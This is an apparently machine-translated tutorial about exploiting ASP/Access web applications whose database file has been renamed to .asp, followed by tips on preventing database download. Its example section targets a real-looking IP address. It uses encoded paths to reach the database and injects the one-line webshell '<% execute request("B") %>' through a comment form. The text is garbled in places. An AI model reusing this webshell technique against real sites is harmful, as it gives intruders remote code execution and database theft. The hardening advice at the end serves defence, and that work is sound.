If you do not directly change the suffix, you can directly download it using tools such as quickshield. In fact, you have opened the door for intruders. Intruders can use a database suffixed with ASP/ASA to directly obtain webshells.
I. Ideas
As we all know, <%> is the identifier of the ASP file, that is, an ASP file will only run between <%>Code, All data in the access + ASP Web system is stored in the database file (MDB file), because the Administrator changes the MDB file to an ASP file, if the submitted data contains <%>, the code between <%> is executed when we access the ASP database. As a result, we only submit malicious code to the database, so the database with the ASP suffix is our webshell.
Ii. Example
Find a target at will. First, let's use the database with the ASP Suffix: http: // 220.170.151.103/test/dlog % 5cshowlog. asp? Cat_id = 5 & log_id = 210
Return Value:Copy codeThe Code is as follows: Microsoft VBScript compiler error code '800a03f6'
'End' missing'
/IISHelp/common/500-100.asp, row 242
Microsoft Jet Database Engine error '20140901'
'D: \ log_mdb \ % 29dlog_mdb % 29. asp 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.
/Test/Conn. asp, Row 18
We submit: http: // 220.170.151.103/test/dlog/log_mdb/% 2529dlog_mdb % 2529. ASP returns a bunch of garbled characters so that we can directly download the database using tools such as Internet Express (which we will not discuss here ). On the homepage, we can see that the "user comments" function is provided. We registered a user and sent a comment:
<% Execute request ("B") %>
In this way, the ASP code <% execute request ("B") %> is written to the database, so the database is our webshell. Submit: http: // 220.170.151.103/test/dlog/log_mdb/% 2529dlog_mdb % 2529. asp at the end of the Garbled text, we can see:
Copy code The Code is as follows:/IISHelp/common/500-100.asp, line 242
Microsoft VBScript runtime error '800a000d'
Type Mismatch: 'execute'
/Test/dlog/log_mdb/% 29dlog_mdb % 29.asp, row 1266
Note: When submitting code to the database, the Code content cannot be too large. Therefore, we use <% execute request ("B") %>.
Iii. Other questions and ideas
1. if the suffix is changed to ASP, illegal ASP Code such as <% = 'a'-1%> is added to the database to completely prevent the downloaded database, because there is illegal ASP code in it, inserting our webshell code and running it will only display the previous error of illegal code, rather than executing our shell code. Although this can prevent certain attacks, there are still some hidden risks. We only need to add the compatible error code before the error code, the inserted webshell code is displayed correctly.
2. for MDB files that do not have a suffix changed, we can download the background password and enter the background. We can use the database backup to change the suffix to ASP.
Summary of MDB anti-download Methods
1: if an extension is not defined under IIS6, The 404 error not found in the file will occur during access.
Therefore, you can name the database as a file name that never appears, for example, XXXXX. xxxxxxxxxxx.
2. If you place the database outside the website, you will never be able to access it. For example, E:/web/is your website
Put the database in E :/
3. As mentioned above, change. mdb to. asp and add a special table containing <% binary characters. In this way, the access file will receive a prompt that the script close character is missing.
4. change MDB. when ASP is opened with winhex, you can find that there is a long part of 00 string after 176. You can change it to a piece of ASP code at will to prevent downloading. This does not affect the database function. For example:
<%
Response. Write ("illegal access ")
Response. End ()
%>
"#" And space are added to the database name. For example, "#" = "<% 35" and the space is "<% 20"
So it is useless to use these ..
If it is your own server, set it in IIS:
Create a blank DLL file and add a ing in IIS. Select the DLL file you just created, enter. MDB with the extension, save the file, and restart the IIS service.